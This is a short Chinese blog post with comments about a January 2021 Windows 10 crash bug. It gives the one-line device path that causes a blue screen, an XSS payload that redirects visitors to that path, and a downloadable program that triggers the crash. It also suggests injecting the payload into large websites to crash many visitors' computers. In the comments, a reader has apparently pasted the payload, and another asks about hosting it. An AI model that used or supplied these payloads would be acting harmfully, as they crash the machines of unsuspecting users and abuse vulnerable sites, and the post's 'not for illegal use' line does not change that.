Windows10最新蓝屏漏洞代码

前言

2021年1月19日,win10蓝屏漏洞从网络上蔓延开来,而且只需要一行代码,即可让你的电脑蓝屏崩溃,接下来我们来看复现过程。

0x1

在Chrome浏览器中输入一行代码就会引起蓝屏代码

\\.\globalroot\device\condrv\kernelconnect

0x2

但是如果用IE浏览器的话就不会出现蓝屏,如下图(不愧是IE,安全高,反应慢)

0x3

虽然说,危害不是特别大的吧,但是!如果大型网站被注入xss的话,那将每天就有几十万的电脑蓝屏。比如说:插入以下xss代码

'><scrIpt>alert(window.location.href='\\.\globalroot\device\condrv\kernelconnect')</script>

那你每次打开这个网站电脑都会蓝屏。
还有,这个代码调用了一个程序,而这个程序我会打包。
运行这个程序也是会蓝屏的,请勿用于非法用途!

0x4

本地下载

点赞
  1. Safari iPhone iOS 14.3
    '>alert(window.location.href='\\.\globalroot\device\condrv\kernelconnect')
    1. 小弟 小弟说道:
      Google Chrome Windows 7
      好家伙,xss都插到wp的评论区了
  2. 小弟的粉丝说道:
    QQbrowser Android 10
    哥,我想问一下 这个xss代码我放到 html一个页面里,别人打开也会蓝屏吧?
    1. 小弟 小弟说道:
      Google Chrome Windows 7
      如果这个网站是可以触发xss的话,win10系统打开会蓝屏的
  3. lx说道:
    Google Chrome Windows 10
    按时

发表回复

电子邮件地址不会被公开。必填项已用 * 标注